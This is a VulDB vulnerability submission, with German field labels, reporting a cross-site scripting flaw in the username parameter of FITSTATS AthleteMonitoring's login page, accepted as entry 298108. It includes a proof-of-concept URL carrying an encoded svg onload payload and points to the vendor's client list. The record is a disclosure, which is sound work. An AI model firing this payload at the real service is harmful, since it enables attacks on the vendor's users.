| Titel | FITSTATS Technologies AthleteMonitoring N/A Cross Site Scripting |
|---|
| Beschreibung | Hello, I found an XSS vulnerability in the username parameter of the application, see that it is a service sold to several organizations and governments.
Vendor URL: https://www.athletemonitoring.com/
On the home page and following url you have all the clients.: https://www.athletemonitoring.com/clients/
PoC:
https://example.com/login.php?username=%22%3E%3Csvg%2Fonload=confirm%28%27xss-c4ng4c31r0%27%29%3E |
|---|
| Benutzer | c4ng4c3ir0 (UID 38456) |
|---|
| Einreichung | 20.02.2025 18:59 (vor 1 Jahr) |
|---|
| Moderieren | 02.03.2025 16:32 (10 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 298108 [FITSTATS Technologies AthleteMonitoring bis 20250302 /login.php Benutzername Cross Site Scripting] |
|---|
| Punkte | 16 |
|---|